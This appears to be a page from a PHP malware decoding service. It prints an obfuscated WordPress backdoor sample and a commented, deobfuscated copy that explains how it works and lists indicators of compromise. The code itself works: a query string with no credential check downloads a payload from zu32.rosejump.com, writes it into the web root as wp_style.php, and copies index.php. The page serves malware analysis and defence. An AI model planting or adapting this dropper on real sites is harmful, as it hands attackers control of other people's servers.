WordPress などで見つかる PHP のマルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php
// Malware sample kept for analysis (code left as submitted, on one line below).
// Summary of what the visible statements do:
//  - $O is a character lookup table; the script builds its string literals by
//    concatenating single characters such as $O[8] . $O[29] . ... so that file
//    names do not appear in plain text.
//  - A request whose URI is "/code_check" or whose query string is "code_check"
//    echoes SCRIPT_NAME followed by "---ok||" and $id ("zu32"), then exits.
//  - A request whose query string decodes to "wp_style" writes the result of
//    OOO(<$oOoOoO>/wp_style.txt) to <DOCUMENT_ROOT>/wp_style.php, copies
//    <DOCUMENT_ROOT>/index.php to <DOCUMENT_ROOT>/index_bak.txt, echoes the
//    query string followed by "---ok", then exits.
//  - Neither branch checks any credential; the request string alone selects it.
// NOTE(review): OOO() is not defined in this excerpt - presumably a remote
// fetch helper; confirm against the full sample. The three *_engine.php URLs
// and the scheme variable are assigned here but not used in the visible part.
// Indicators visible in this sample: host zu32.rosejump.com, and the files
// wp_style.php and index_bak.txt in the document root.
$O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56'; $id = "zu32"; $oOoOoO = "http://zu32.rosejump.com"; $oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php"; $oOOoOooO = "http://zu32.rosejump.com/map_engine.php"; $oOOooOOo = "http://zu32.rosejump.com/products_engine.php"; $oOoOOoOo = $_SERVER["REQUEST_URI"]; $oOOooOOoOoOo = $_SERVER["QUERY_STRING"]; $oOOoOooOOoOo = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; $oOoOOooOoO = $_SERVER["SCRIPT_NAME"]; $oOOooOOoOooO = $_SERVER["DOCUMENT_ROOT"]; if ($oOoOOoOo == "/code_check" || $oOOooOOoOoOo == "code_check") { echo $oOoOOooOoO . $O[30] . $O[30] . $O[30] . $O[28] . $O[20] . $O[55] . $O[55] . $id; exit; } if ($oOOooOOoOoOo == $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13]) { file_put_contents($oOOooOOoOooO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[29] . $O[67] . $O[29], OOO($oOoOoO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[4] . $O[10] . $O[4])); copy($oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[5] . $O[29] . $O[67] . $O[29], $oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[61] . $O[50] . $O[44] . $O[20] . $O[5] . $O[4] . $O[10] . $O[4]); echo $oOOooOOoOoOo . $O[30] . $O[30] . $O[30] . $O[28] . $O[20]; exit; }
<?php
// Annotated malware sample: statements are unchanged, only split one per line
// and commented for analysis. Decoded values in the comments were obtained by
// indexing $O by hand.

// Character lookup table. Later string literals are assembled one character at
// a time from this table ($O[27] is "/", $O[5] is ".", $O[30] is "-").
$O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56';
// Identifier echoed back by the "code_check" branch below.
$id = "zu32";
// Base URL of the remote host the script downloads from.
$oOoOoO = "http://zu32.rosejump.com";
// Three further URLs on the same host; none of them is used in the visible excerpt.
$oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php";
$oOOoOooO = "http://zu32.rosejump.com/map_engine.php";
$oOOooOOo = "http://zu32.rosejump.com/products_engine.php";
// Request URI and query string: these two values select the branches below.
$oOoOOoOo = $_SERVER["REQUEST_URI"];
$oOOooOOoOoOo = $_SERVER["QUERY_STRING"];
// Scheme of the current request; assigned but not used in the visible excerpt.
$oOOoOooOOoOo = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://";
// Path of the running script and the site's document root.
$oOoOOooOoO = $_SERVER["SCRIPT_NAME"];
$oOOooOOoOooO = $_SERVER["DOCUMENT_ROOT"];
// Presence check: URI "/code_check" or query string "code_check" makes the
// script answer with SCRIPT_NAME followed by "---ok||" and $id, then stop.
// No credential is checked, so any client can trigger this response.
if ($oOoOOoOo == "/code_check" || $oOOooOOoOoOo == "code_check") {
    // Decodes to: SCRIPT_NAME . "---ok||" . "zu32"
    echo $oOoOOooOoO . $O[30] . $O[30] . $O[30] . $O[28] . $O[20] . $O[55] . $O[55] . $id;
    exit;
}
// Dropper branch: the right-hand side decodes to "wp_style", so this runs when
// the query string is exactly that value. Again no credential is checked.
if ($oOOooOOoOoOo == $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13]) {
    // Writes OOO(<base URL>/wp_style.txt) to <DOCUMENT_ROOT>/wp_style.php.
    // NOTE(review): OOO() is not defined in this excerpt - presumably a remote
    // fetch helper; confirm against the full sample.
    file_put_contents($oOOooOOoOooO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[29] . $O[67] . $O[29], OOO($oOoOoO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[4] . $O[10] . $O[4]));
    // Copies <DOCUMENT_ROOT>/index.php to <DOCUMENT_ROOT>/index_bak.txt.
    // NOTE(review): a .txt copy in the web root may expose the PHP source over
    // HTTP, depending on server configuration - verify on affected hosts.
    copy($oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[5] . $O[29] . $O[67] . $O[29], $oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[61] . $O[50] . $O[44] . $O[20] . $O[5] . $O[4] . $O[10] . $O[4]);
    // Decodes to: QUERY_STRING . "---ok" (acknowledgement returned to the requester).
    echo $oOOooOOoOoOo . $O[30] . $O[30] . $O[30] . $O[28] . $O[20];
    exit;
}
// Indicators visible in this sample: host zu32.rosejump.com; files wp_style.php
// and index_bak.txt in the document root; responses containing "---ok".